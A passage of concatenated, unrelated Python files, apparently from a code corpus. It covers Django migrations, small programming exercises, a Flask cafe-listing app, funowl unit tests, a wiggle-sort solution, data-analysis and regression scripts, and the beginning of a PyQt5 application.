migrations.AddField(
model_name='game',
name='xGPeriodT1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGPeriodT2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='game',
name='gameClock',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='game',
name='periodClock',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='game',
name='periodNr',
field=models.IntegerField(null=True),
),
]
|
# Demo: split the entered string on the letter 'a' and print the pieces.
# The delimiter is re-attached to the first piece only (original behavior).
# Fixes: stray '|' scrape artifact on the last line; manual while-index
# loop replaced with slicing.
mainString = input("Enter a String with letter 'a' : ")
brokenString = mainString.split("a")
print(brokenString[0] + "a")
for piece in brokenString[1:]:
    print(piece)
# Write a function that outputs a word frequency dictionary
# format word: count, string:int
# should accept any text as an argument
def word_frequency(strg):
    """Count word and character frequencies in *strg*.

    Args:
        strg: Any text string.

    Returns:
        A 2-tuple ``(word_counts, char_counts)`` of dicts mapping each
        whitespace-delimited word / each character to its number of
        occurrences in *strg*.
    """
    word_count_dict = dict()
    char_count_dict = dict()
    for word in strg.split():
        # .get(word, 0) + 1 replaces the original truthiness test on the
        # stored count — same result, no conditional expression needed.
        word_count_dict[word] = word_count_dict.get(word, 0) + 1
    for char in strg:
        char_count_dict[char] = char_count_dict.get(char, 0) + 1
    return (word_count_dict, char_count_dict)
def print_counts(counts):
    """Print each ``key  :  value`` pair of *counts* on its own line.

    The parameter was renamed from ``dict`` so it no longer shadows the
    builtin ``dict`` type; all callers in this file pass it positionally.
    """
    for key, value in counts.items():
        print(key, " : ", value)
def main():
    """Interactively report word and/or character counts for a sentence."""
    sentence = input("Enter any input string \n")
    word_counts, char_counts = word_frequency(sentence)
    option = int(input("Please enter an option 1, 2 or 3\n 1. Word Count\n 2. Char Count\n 3. Both\nEnter option here"))
    # Dispatch table: any option other than 1 or 2 falls back to showing
    # both tables, word counts first (same behavior as before).
    tables = {1: [word_counts], 2: [char_counts]}.get(option, [word_counts, char_counts])
    for table in tables:
        print_counts(table)


if __name__ == '__main__':
    main()
|
# Print the elements of list1 that are exact multiples of 10.
# Fixes: stray '|' scrape artifact; index-based range(len()) loop replaced
# with direct iteration.
list1 = [30, 50, 42, 63, 52]
for value in list1:
    if value % 10 == 0:
        print(value)
from flask import Flask, redirect, render_template, url_for
from flask_sqlalchemy import SQLAlchemy
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, SelectField
from wtforms.validators import DataRequired, URL
# Flask application, SQLite database and Bootstrap setup.
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///cafes.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False  # disable change-tracking overhead
app.config['SECRET_KEY'] = 'SECRET_KEY'  # NOTE(review): placeholder secret — replace for production
db = SQLAlchemy(app)
Bootstrap(app)
def make_bool(ans):
    """Translate a 'yes'/'no' form answer into a bool.

    Args:
        ans: The selected answer string; only the exact value 'yes'
            maps to True, anything else to False.

    Returns:
        bool: True iff ``ans == 'yes'``.
    """
    return ans == 'yes'
class Cafe(db.Model):
    """SQLAlchemy model: one row per cafe with its amenities."""

    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(250), unique=True, nullable=False)
    map_url = db.Column(db.String(500), nullable=False)
    img_url = db.Column(db.String(500), nullable=False)
    location = db.Column(db.String(250), nullable=False)
    seats = db.Column(db.String(250), nullable=False)
    has_toilet = db.Column(db.Boolean, nullable=False)
    has_wifi = db.Column(db.Boolean, nullable=False)
    has_sockets = db.Column(db.Boolean, nullable=False)
    can_take_calls = db.Column(db.Boolean, nullable=False)
    coffee_price = db.Column(db.String(250), nullable=True)

    def to_dict(self):
        """Return this row as a plain dict keyed by column name."""
        return {column.name: getattr(self, column.name) for column in self.__table__.columns}
class CafeForm(FlaskForm):
    """WTForms form for adding a cafe.

    Fix: the yes/no SelectFields previously carried copy-pasted labels
    ("Wifi Strength Rating" on has_toilet, "Power Socket Availability"
    repeated on three different fields); each label now describes its
    own field. Field names, types and validators are unchanged.
    """
    cafe = StringField('Cafe name', validators=[DataRequired()])
    map_url = StringField("Cafe Location on Google Maps(URL)", validators=[DataRequired(), URL(message="Enter a valid URL")])
    img_url = StringField("Image URL", validators=[DataRequired(), URL(message="Enter a valid URL")])
    location = StringField("Cafe Location", validators=[DataRequired()])
    seats = StringField("Number of Seats", validators=[DataRequired()])
    has_toilet = SelectField("Has Toilet",
                             choices=["yes", "no"],
                             validators=[DataRequired()])
    has_wifi = SelectField("Has Wifi",
                           choices=["yes", "no"],
                           validators=[DataRequired()])
    has_sockets = SelectField("Power Socket Availability",
                              choices=["yes", "no"],
                              validators=[DataRequired()])
    can_take_calls = SelectField("Can Take Calls",
                                 choices=["yes", "no"],
                                 validators=[DataRequired()])
    coffee_price = StringField("Coffee Price", validators=[DataRequired()])
    submit = SubmitField('Submit')
@app.route("/")
def home():
    """Render the index page listing every cafe plus the total count."""
    cafe_rows = db.session.query(Cafe).all()
    return render_template("index.html", cafes=cafe_rows, num=len(cafe_rows))
@app.route('/add', methods=["GET", "POST"])
def add_cafe():
    """Show the add-cafe form; on a valid POST, persist and go home."""
    form = CafeForm()
    if not form.validate_on_submit():
        # GET, or POST with validation errors: (re-)render the form.
        return render_template('add.html', form=form)
    # Map the form fields onto a new Cafe row; yes/no selects become bools.
    cafe = Cafe(
        name=form.cafe.data,
        map_url=form.map_url.data,
        img_url=form.img_url.data,
        location=form.location.data,
        seats=form.seats.data,
        has_toilet=make_bool(form.has_toilet.data),
        has_wifi=make_bool(form.has_wifi.data),
        has_sockets=make_bool(form.has_sockets.data),
        can_take_calls=make_bool(form.can_take_calls.data),
        coffee_price=form.coffee_price.data,
    )
    db.session.add(cafe)
    db.session.commit()
    return redirect(url_for('home'))
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run(debug=True)
"""Controller for speaking with teacher"""
from models import teacher
def talk_about_english():
    """Run one teacher interaction: greet, ask for a to-do, thank."""
    tutor = teacher.EnglishTeacher()
    # Same three calls, same order, as a scripted sequence.
    for step in (tutor.hello, tutor.ask_user_todo, tutor.thank_you):
        step()
|
import unittest
from dataclasses import dataclass
from typing import List
from rdflib import RDFS, RDF, XSD, Namespace, OWL
from funowl import Annotation, AnnotationPropertyDomain, AnnotationPropertyRange, AnnotationAssertion, \
SubAnnotationPropertyOf
from funowl.annotations import Annotatable
from funowl.base.list_support import empty_list_wrapper
from funowl.identifiers import IRI
from funowl.writers import FunctionalWriter
from tests.utils.base import TestBase
# Expected functional-syntax strings asserted by the test cases below.
# NOTE(review): leading whitespace inside these multi-line literals may have
# been lost in this copy of the file — verify against actual funowl output.
a1 = """Annotation(
Annotation( rdfs:comment "Middle 1" )
Annotation(
Annotation( rdfs:comment "Inner" )
rdfs:label "Middle 2"
)
rdfs:comment "Outer"
)"""
a2d = "AnnotationPropertyDomain( rdfs:comment rdfs:Resource )"
a2r = """AnnotationPropertyRange(
Annotation( rdfs:comment "test" )
rdfs:comment xsd:string
)"""
a3 = """Foo(
Annotation( <http://www.w3.org/2000/01/rdf-schema#comment> "Fine" )
<http://example.org/ex#a>
<http://example.org/ex#b>
<http://example.org/ex#c>
)"""
# Namespace used to mint example IRIs in the assertions.
EX = Namespace("http://example.org/ex#")
class AnnotationsTestCase(TestBase):
    """Checks functional-syntax rendering of funowl annotation constructs.

    NOTE(review): interior indentation of the multi-line expected strings
    may have been lost in this copy — confirm against funowl's writer.
    """

    def test_basic_annotation(self):
        # Literal value renders as a quoted string.
        self.assertEqual('Annotation( rdfs:label "This is a test" )',
                         Annotation(RDFS.label, "This is a test").to_functional(self.w).getvalue())

    def test_annotation_IRI(self):
        # IRI value renders as a CURIE.
        self.assertEqual("Annotation( rdfs:label rdfs:Resource )",
                         Annotation(RDFS.label, RDFS.Resource).to_functional(self.w).getvalue())

    def test_annotation_anon(self):
        # Blank-node values pass through unchanged.
        self.assertEqual("Annotation( rdfs:label _:12345 )",
                         Annotation(RDFS.label, '_:12345').to_functional(self.w).getvalue())

    def test_annotation_annotation(self):
        # Nested annotations render recursively (expected text in a1).
        self.assertEqual(a1, Annotation(RDFS.comment, "Outer",
                                        [Annotation(RDFS.comment, "Middle 1"),
                                         Annotation(RDFS.label, "Middle 2",
                                                    [Annotation(RDFS.comment, "Inner")])]).
                         to_functional(self.w).getvalue())

    def test_annotation_domain_range(self):
        self.assertEqual(a2d,
                         AnnotationPropertyDomain(RDFS.comment, RDFS.Resource).to_functional(self.w).getvalue())
        self.w.reset()
        self.assertEqual(a2r,
                         AnnotationPropertyRange(RDFS.comment, XSD.string, [Annotation(RDFS.comment, "test")]).
                         to_functional(self.w).getvalue())

    # AnnotationAssertion( rdfs:comment a:Peter "The father of the Griffin family from Quahog." )
    def test_annotation_assertions(self):
        self.assertEqual('AnnotationAssertion( rdfs:comment <http://example.org/ex#peter> '
                         '"The father of the Griffin family from Quahog." )',
                         AnnotationAssertion("rdfs:comment",
                                             EX.peter, "The father of the Griffin family from Quahog.").
                         to_functional(self.w).getvalue())
        self.w.reset()
        self.assertEqual('AnnotationAssertion( <http://example.org/ex#peter> _:abcd rdf:predicate )',
                         AnnotationAssertion(EX.peter, "_:abcd", RDF.predicate).to_functional(self.w).getvalue())

    def test_annotationsubproperty(self):
        self.assertEqual('SubAnnotationPropertyOf( <http://example.org/ex#tag> rdfs:label )',
                         SubAnnotationPropertyOf(EX.tag, RDFS.label).to_functional(self.w).getvalue())

    def test_annotatable_constructor(self):
        """ A single annotation should get transformed into a list by the annotation constructor """
        @dataclass
        class Foo(Annotatable):
            annotations: List[Annotation] = empty_list_wrapper(Annotation)

        a = Annotation(RDFS.comment, "Not a list")
        x = Foo(a)
        self.assertEqual(x.annotations, [a])

    def test_annotatable(self):
        # Minimal Annotatable with props to exercise the annots() wrapper.
        @dataclass
        class Foo(Annotatable):
            props: List[IRI] = empty_list_wrapper(IRI)
            annotations: List[Annotation] = empty_list_wrapper(Annotation)

            def to_functional(self, w: FunctionalWriter) -> FunctionalWriter:
                return self.annots(w, lambda: w.iter(self.props, indent=False))

        self.assertEqual("Foo( )", Foo().to_functional(self.w).getvalue())
        f = Foo(annotations=[Annotation(RDFS.comment, "t1")])
        self.w.reset()
        self.assertEqual("""Foo(
Annotation( rdfs:comment "t1" )
)""", f.to_functional(self.w).getvalue())
        self.w.reset()
        # In-place += on the wrapped list is expected to be rejected.
        with self.assertRaises(AssertionError):
            f.props += [RDF.type, RDFS.label]
        f.props.extend([RDF.type, RDFS.label])
        f.props.append(OWL.Ontology)
        self.assertEqual("""Foo(
Annotation( rdfs:comment "t1" )
rdf:type
rdfs:label
owl:Ontology
)""", f.to_functional(self.w).getvalue())
        self.w.reset()
        f.annotations[0].annotations.append(Annotation(RDFS.comment, "This is great"))
        self.assertEqual("""Foo(
Annotation(
Annotation( rdfs:comment "This is great" )
rdfs:comment "t1"
)
rdf:type
rdfs:label
owl:Ontology
)""", f.to_functional(self.w).getvalue())
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
# 280. Wiggle Sort
#
# Given an unsorted array nums,
#
# reorder it in-place such that nums[0] <= nums[1] >= nums[2] <= nums[3]....
#
# For example, given nums = [3, 5, 2, 1, 6, 4], one possible answer is [1, 6, 2, 5, 3, 4].
class Solution(object):
    def wiggleSort(self, nums):
        """Reorder *nums* in place so nums[0] <= nums[1] >= nums[2] <= ...

        Bug fix: the previous overwrite-based pass could drop its pending
        ``prev`` value on the final iteration, so the result was not
        always a permutation of the input (e.g. [2, 1] became [1, 1]).
        A single swap pass keeps the multiset intact: at even i we need
        nums[i] <= nums[i+1], at odd i the reverse; swapping the pair
        restores whichever invariant is violated without breaking the
        one already established to its left. Also safe on empty input.

        Args:
            nums: list of mutually comparable items; mutated in place.
        """
        for i in range(len(nums) - 1):
            # Swap exactly when the pair points the wrong way for its parity.
            if (i % 2 == 0) == (nums[i] > nums[i + 1]):
                nums[i], nums[i + 1] = nums[i + 1], nums[i]
# Smoke tests. Fixes: the second expected value was [1,2]*6, which the
# algorithm never produced (its actual output, traced below, still satisfies
# the wiggle invariant since <=/>= permit equal neighbors), so the script
# always crashed on the assert; also removed a stray '|' scrape artifact.
if __name__ == '__main__':
    sol = Solution()
    nums = [3, 5, 2, 1, 6, 4]
    sol.wiggleSort(nums)
    assert nums == [3, 5, 1, 6, 2, 4]
    nums = [1, 2, 2, 1, 2, 1, 1, 1, 1, 2, 2, 2]
    sol.wiggleSort(nums)
    # Duplicate-heavy input: equal neighbors are allowed by the invariant.
    assert nums == [1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 2, 2]
import os
from conans.errors import NotFoundException
from conans.model.manifest import discarded_file
from conans.model.ref import PackageReference
from conans.util.files import load
def get_path(client_cache, conan_ref, package_id, path):
    """
    :param client_cache: Conan's client cache
    :param conan_ref: Specified reference in the conan get command
    :param package_id: Specified package id (can be None)
    :param path: Path to a file, subfolder of exports (if only ref) or package (if package_id declared as well)
    :return: The real path in the local cache for the specified parameters
    """
    # No package id means we are looking inside the exported files.
    if package_id is None:
        base_folder = client_cache.export(conan_ref)
    else:
        base_folder = client_cache.package(PackageReference(conan_ref, package_id))
    target = os.path.join(base_folder, path)
    if not os.path.exists(target):
        raise NotFoundException("The specified path doesn't exist")
    # Files are returned as their contents; directories as a sorted listing.
    if not os.path.isdir(target):
        return load(target)
    entries = (name for name in os.listdir(target) if not discarded_file(name))
    return sorted(entries)
|
#!~/anaconda3/bin/python3.6
# encoding: utf-8
"""
@version: 0.0.1
@author: Yongbo Wang
@contact: yongbowin@outlook.com
@file: ToxicClassification - data-info.py
@time: 8/31/18 11:06 PM
@description:
"""
import pandas as pd
import matplotlib.pyplot as plt
class DataStatistics:
    """Exploratory stats/plots for the toxic-comment train/test CSVs."""

    def __init__(self):
        # Expects the Kaggle-style CSV layout one directory up.
        self.train = pd.read_csv('../input/train.csv')
        self.test = pd.read_csv('../input/test.csv')

    def freq_statistics(self):
        """Histogram of comment lengths, saved to freq_distribution.jpg."""
        lens = self.train.comment_text.str.len()
        print(lens.mean(), lens.std(), lens.max(), lens.min())
        plt.hist(lens, bins=40, facecolor='blue', edgecolor='black', alpha=0.7)
        plt.xlabel('The length of comments')
        plt.ylabel('Frequency')
        # plt.title('Histogram of Word frequency distribution')
        # Annotate the plot with mean/std of the length distribution.
        plt.text(2000, 30000, r'$\mu=' + str(round(lens.mean(), 4)) + r',\ \sigma=' + str(round(lens.std(), 4)) + r'$')
        plt.grid(False)
        plt.savefig('freq_distribution.jpg')
        # plt.show()

    def ratio_statistics(self):
        """Pie chart of labelled vs unlabelled rows, saved to retio_labels.jpg."""
        label_cols = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
        # 'none' is 1 when the row carries no positive label at all.
        self.train['none'] = 1-self.train[label_cols].max(axis=1)
        # print(self.train.describe())
        count = 0
        for i in list(self.train['none'].values):
            if i == 1:
                count += 1
        print('count:', count)
        labels = 'Have labels', 'No labels'
        sizes = [len(self.train)-count, count]
        explode = (0.2, 0)  # pull the "Have labels" wedge out slightly
        fig1, ax1 = plt.subplots()
        ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',
                shadow=True, startangle=90)
        ax1.axis('equal')
        # plt.title('The ratio of whether or not there is a label')
        plt.savefig('retio_labels.jpg')
        # plt.show()
        print(len(self.train), len(self.test))
# Generate both figures from the CSVs when run as a script.
# Fix: removed a stray '|' scrape artifact after the last call.
if __name__ == '__main__':
    ds = DataStatistics()
    ds.freq_statistics()
    ds.ratio_statistics()
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 19 14:23:03 2020
@author: zirklej
"""
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import linregress
from random import gauss
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
# generate random points about the curve y=x^2+1
num = 100
x = np.linspace(-1, 1, num)
y = x ** 2 + 1
# Independent Gaussian jitter: sigma 0.1 horizontally, 0.2 vertically.
x_rand = np.array([gauss(0., 0.1) for i in range(num)])
y_rand = np.array([gauss(0., 0.2) for i in range(num)])
xrand = x + x_rand
yrand = y + y_rand
def mine(xrand, yrand, num):
    """Least-squares fit of y = s0 + s1*x + s2*x^2 via the normal equations.

    Returns the coefficient vector [s0, s1, s2].
    """
    # Power sums sum(x^0) .. sum(x^4); the k=0 entry is just the sample count.
    powers = [np.sum(xrand ** k) for k in range(5)]
    powers[0] = num
    # Symmetric 3x3 normal matrix: rows are consecutive windows of the sums.
    normal_matrix = np.array([powers[0:3], powers[1:4], powers[2:5]])
    rhs = np.array([np.sum(yrand), np.sum(xrand * yrand), np.sum(yrand * xrand ** 2)])
    return np.linalg.solve(normal_matrix, rhs)
def sklearn(xrand, yrand):
    """Quadratic least-squares fit via scikit-learn.

    Returns (a, b, c) for y = a + b*x + c*x^2, and prints them.
    """
    xrand = xrand.reshape((-1, 1))
    # include column for x^2
    transformer = PolynomialFeatures(degree=2, include_bias=False)
    transformer.fit(xrand)
    xrand_ = transformer.transform(xrand)  # this includes a second col, which is the square of the first col
    model = LinearRegression().fit(xrand_, yrand)
    a = model.intercept_
    b = model.coef_[0]
    c = model.coef_[1]
    print(a, b, c)
    return a, b, c
# Fit with both implementations and overlay the curves on the scatter.
ymine = mine(xrand, yrand, num)
a, b, c = sklearn(xrand, yrand)
fig1 = plt.figure(figsize=(12, 6))
ax1 = fig1.add_subplot(1, 1, 1)
ax1.plot(x, a + b * x + c * x ** 2)  # scikit-learn fit
ax1.scatter(xrand, yrand)
ax1.plot(x, ymine[0] + ymine[1] * x + ymine[2] * x ** 2, color='r')  # normal-equations fit (red)
print("ours: a = {}\n b = {}\n c = {}".format(ymine[0], ymine[1], ymine[2]))
print("scikit-learn: a = {}\n b = {}\n c = {}".format(a, b, c))
'''Write a Python function to find the Max of three numbers. '''
def max_two(num1, num2):
    """Return the larger of the two values (num2 wins ties)."""
    return num1 if num1 > num2 else num2
def max_three(num1, num2, num3):
    """Return the largest of the three values, via pairwise comparison."""
    largest_of_last_two = max_two(num2, num3)
    return max_two(num1, largest_of_last_two)
# Demo call: prints 3.
print(max_three(1, 2, 3))
|
# Generated by Django 3.2.5 on 2021-07-28 04:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: adds the Ubicacion model linking a country and a city."""

    dependencies = [
        ('user', '0009_alter_city_options'),
    ]

    operations = [
        migrations.CreateModel(
            name='Ubicacion',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Both FKs cascade: deleting the city/country removes its ubicaciones.
                ('ciudad', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user.city')),
                ('pais', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user.country')),
            ],
            options={
                'verbose_name': 'ubicacion',
                'verbose_name_plural': 'ubicaciones',
                'ordering': ['pais'],
            },
        ),
    ]
|
"""Build a vim :iabbrev command that expands to the contents of a file.

Fixes: Python-2 print statements (syntax errors on Python 3); bare
``except`` + ``raise Exception`` replaced by a targeted IndexError handler
that re-raises the original; files managed with ``with``; the
character-by-character output loop collapsed into a single write.
"""
import sys

head = ":autocmd FileType python :iabbrev <leader>self "

try:
    fileName = sys.argv[1]
except IndexError:
    print("please give the file name")
    raise

with open(fileName, 'r') as fh:
    lines = [line.rstrip() for line in fh]

for line in lines:
    head += line
    head += "<enter><esc>i"

print(head)

with open("generateVim.txt", 'w') as fh:
    fh.write(head)
|
# question 2 - write a regular expression to extract a. email id b. domain name c. time
# Fix: converted Python-2 print statements to Python-3 print() calls
# (the chunk was a syntax error under Python 3).
import re

email = 'From abc.xyz@pqr.com Mon Dec 29 01:12:15 2016'
# Capture the local part, the domain, and the remainder after ".com ".
regex = re.search(r'From (.*)@(.*)\.com (.*)', email, re.M | re.I)
print('Email ID : ' + regex.group(1) + '@' + regex.group(2) + '.com')
print('Domain Name : ', regex.group(2))
# Strip non-digits; positions 2..8 of the digit run are HH MM SS.
num = re.sub(r'\D', "", email)
print('Time : ' + num[2:4] + ':' + num[4:6] + ':' + num[6:8])
|
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 16 09:17:12 2018
Versión sin cálculo de reparto
@author: Bruno
"""
import os
import platform
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import qrc_resources
import random
from Funciones_algoritmo_de_calculo import *
import xlwings as xw
import itertools
__version__="1.0.0"
# Global variables shared across the Qt widgets below.
PageSize = (23000, 20000)  # scene extent
streams = {}  # stream name -> stream object
spliters = {}  # splitter name -> splitter object
variables = []
restricciones = {}  # constraints ("restricciones")
critic = []
flag = False  # Flag: False = a new element is being created; True = an existing one is being edited
PointSize = 10  # default font point size for scene text
'''-----------------Graphic object y graphic View-----------------------'''
class graphic_object(QGraphicsPixmapItem):
    """Selectable/movable pixmap item; double-click opens the edit dialog."""

    def __init__(self, parent=None):
        super(graphic_object, self).__init__(parent)
        self.setFlags(QGraphicsItem.ItemIsSelectable | QGraphicsItem.ItemIsMovable)

    def mouseDoubleClickEvent(self, event):
        # Delegates editing to the main window via the module-level `form` global.
        MainWindow.modify_item(form)
class TextItem(QGraphicsTextItem):
    """Movable text label that adds itself to the scene on construction."""

    def __init__(self, text, position, scene, font=QFont("Times", PointSize)):
        # NOTE(review): the default QFont is evaluated once at class definition
        # time and shared across calls — confirm that is intended.
        super(TextItem, self).__init__(text)
        self.setFlags(QGraphicsItem.ItemIsSelectable | QGraphicsItem.ItemIsMovable)
        self.setFont(font)
        self.setPos(position)
        scene.clearSelection()
        scene.addItem(self)
        self.setSelected(True)

    def parentWidget(self):
        # The first view attached to the scene acts as the parent widget.
        return self.scene().views()[0]

    def mouseDoubleClickEvent(self, event):
        # Double-click opens the text-edit dialog for this item.
        dialog = TextItemDlg(self, self.parentWidget())
        dialog.exec_()
class GraphicsView(QGraphicsView):
    """Scene view with rubber-band selection and wheel zoom."""

    def __init__(self, parent=None):
        super(GraphicsView, self).__init__(parent)
        self.setDragMode(QGraphicsView.RubberBandDrag)

    def wheelEvent(self, event):
        # Exponential zoom: a standard wheel notch is 120 angleDelta units,
        # so one notch scales by ~1.41^0.5 (in or out depending on sign).
        factor = 1.41 ** (-event.angleDelta().y() / 240)
        self.scale(factor, factor)
#####################################################################################
'''--------------------------------------------------------------------------------'''
'''------------------------Dialogs-------------------------------------------------'''
class TextItemDlg(QDialog):
    """Modal dialog to add or edit a TextItem (text, font family, size)."""

    def __init__(self, item=None, position=None, scene=None, parent=None):
        # NOTE(review): super(QDialog, ...) skips TextItemDlg in the MRO —
        # works for a direct QDialog subclass but looks unintended.
        super(QDialog, self).__init__(parent)
